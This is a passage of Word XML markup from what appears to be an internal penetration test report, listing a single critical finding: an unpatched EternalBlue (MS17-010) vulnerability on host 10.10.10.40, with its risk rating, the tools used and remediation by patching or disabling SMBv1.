    <w:p w14:paraId="49D759B3" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD7B191" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6779DC" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C87EE1C" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0C238B" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B118629" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DEDA3E" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7893C67E" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DCEA7F" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06546025" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06698577" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B2027E8" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC4D3FD" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AF1B7D" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57294E2E" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0129E404" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4587F5" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DB7C18" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1632EDC5" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C28AF9F" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BEDAC4A" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F121FB" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3032B68D" w14:textId="77777777" w:rsidR="006528B5" w:rsidRDefault="006528B5" w:rsidP="006528B5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540668E7" w14:textId="77777777" w:rsidR="00DE1F3F" w:rsidRDefault="00DE1F3F" w:rsidP="00DE1F3F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC85FEC" w14:textId="153F1366" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="00BD5C4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc169647990"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0ABD89CC" w14:textId="4BE2CE89" w:rsidR="00B94616" w:rsidRDefault="00F843E8" w:rsidP="00B94616">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc169647991"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Internal Penetration Test Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2394F031" w14:textId="77777777" w:rsidR="00B94616" w:rsidRDefault="00B94616" w:rsidP="00B94616"/>
    <w:p w14:paraId="6296874B" w14:textId="6E6C4001" w:rsidR="001F4050" w:rsidRPr="002C7E04" w:rsidRDefault="001F4050" w:rsidP="00582913">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc169647992"/>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Finding</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPT-</w:t>
      </w:r>
      <w:r w:rsidR="00501579">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>001</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7E04">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unpatched Eternal Blue Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00651173">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00651173">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="FF3D3D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="0F272171" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="1632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="677114E2" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="783B1F27" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="004F0AF2" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D4710">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Eternal Blue (i.e., MS17-010) is a remote code-execution vulnerability that affects Windows hosts. The vulnerability is caused by the improper handling of certain requests in Microsoft Server Message Block 1.0 (SMBv1). When exploited with a specially crafted packet, an unauthenticated attacker can execute arbitrary code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="51665170" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="1631"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B3AB2B5" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="45E6AE9B" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="006300A5" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Likelihood: High – Malicious actors have used SMB exploitations like EternalBlue in recent breaches.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC55D08" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="006300A5" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="578EC4E3" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="006300A5" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Impact: Very High – If exploited, an attacker gains code execution as the system user. An adversary will require additional techniques to obtain domain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B240F29" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="004F0AF2" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="230" w:lineRule="auto"/>
              <w:ind w:right="43"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006300A5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>administrator access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="76814CE0" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D4F22B5" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Affected Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3FF35E9C" w14:textId="4E9A8669" w:rsidR="00472496" w:rsidRPr="004F0AF2" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="251" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.10.</w:t>
            </w:r>
            <w:r w:rsidR="000065F0">
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="09F9610A" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="596F3525" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Used:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A56AB61" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="004F0AF2" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="252" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nmap, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="69CA8B4C" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F0C63F8" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="247" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B4C6E7" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="596408CB" w14:textId="77777777" w:rsidR="00472496" w:rsidRDefault="00472496" w:rsidP="00472496">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="252" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">I recommend all Windows Client or Server </w:t>
            </w:r>
            <w:r w:rsidRPr="00871A01">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>deploy the security patch available from Microsoft in MS17-010. All you need to do is update your software to the latest version of Window</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="006D4176">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[1][2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[3]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB23C91" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="005B2A97" w:rsidRDefault="00472496" w:rsidP="00472496">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:line="252" w:lineRule="exact"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>If an update is not permitted due to the environment where legacy system are critical to the infrastructure, a workaround would be to disable SMBv1</w:t>
            </w:r>
            <w:r w:rsidRPr="006D4176">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[1][2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>[3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00472496" w:rsidRPr="004F0AF2" w14:paraId="13A92987" w14:textId="77777777" w:rsidTr="00890CDF">
        <w:trPr>
          <w:trHeight w:val="816"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF3D3D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A4ECFEF" w14:textId="77777777" w:rsidR="00472496" w:rsidRPr="00205061" w:rsidRDefault="00472496" w:rsidP="00890CDF">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00205061">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
